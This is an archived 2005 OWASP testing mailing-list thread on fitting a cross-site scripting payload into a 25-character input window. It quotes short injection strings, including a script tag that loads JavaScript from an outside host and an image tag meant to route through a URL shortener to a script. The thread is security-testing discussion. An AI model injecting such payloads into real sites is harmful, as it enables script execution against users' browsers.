[OWASP-TESTING] XSS in 25 characters or less

Alex Smolen alsmola at yahoo.com
Wed May 18 15:07:36 EDT 2005


Actually, you could include the  <img
src=tinyurl.com/whatever>
and have the tiny url point to a java script
somewhere.

Do I get my pint?
--- Alex Smolen <alsmola at yahoo.com> wrote:
> You could use tinyurl.com to embed a malicious link
> (say, one that executes a XST attack). This still
> requires a windows larger than 25 to get the domain
> to
> execute a malicious XSS, I think.
> 
> --- Eoin Keary <eoinkeary at hotmail.com> wrote:
> > Hi,
> > I have a window of 25 chars to perform a XSS
> > exploit.
> > anything more is truncated by the server.
> > 
> > <script src=http://a.com/z.js></script>
> > 
> > - this is 39 chars
> > We can do HTML injection ("<a href=....") to a
> > degree but anyone any ideas 
> > on how to execute script in such a small window
> (25
> > chars)?
> > we need to stay in the same domain (xyz.com)
> inorder
> > to make the attack 
> > useful. so redirecting to another domain with the
> > "<a href..." is no good.
> > 
> > First correct answer gets a pint of Guinness
> (Larry
> > S, you're not included 
> > for the pint as I owe you too many).
> > 
> > Eoin
> > 
> >
>
_________________________________________________________________
> > More features, more fun, still absolutely FREE -
> get
> > Messsenger 7.0! 
> > http://messenger.msn.co.uk
> > 
> > 
> > 
> >
>
-------------------------------------------------------
> > This SF.Net email is sponsored by Oracle Space
> > Sweepstakes
> > Want to be the first software developer in space?
> > Enter now for the Oracle Space Sweepstakes!
> >
>
http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
> > _______________________________________________
> > owasp-testing mailing list
> > owasp-testing at lists.sourceforge.net
> >
>
https://lists.sourceforge.net/lists/listinfo/owasp-testing
> > 
> 
> 
>
-------------------------------------------------------
> This SF.Net email is sponsored by Oracle Space
> Sweepstakes
> Want to be the first software developer in space?
> Enter now for the Oracle Space Sweepstakes!
>
http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
> _______________________________________________
> owasp-testing mailing list
> owasp-testing at lists.sourceforge.net
>
https://lists.sourceforge.net/lists/listinfo/owasp-testing
> 




More information about the Owasp-testing mailing list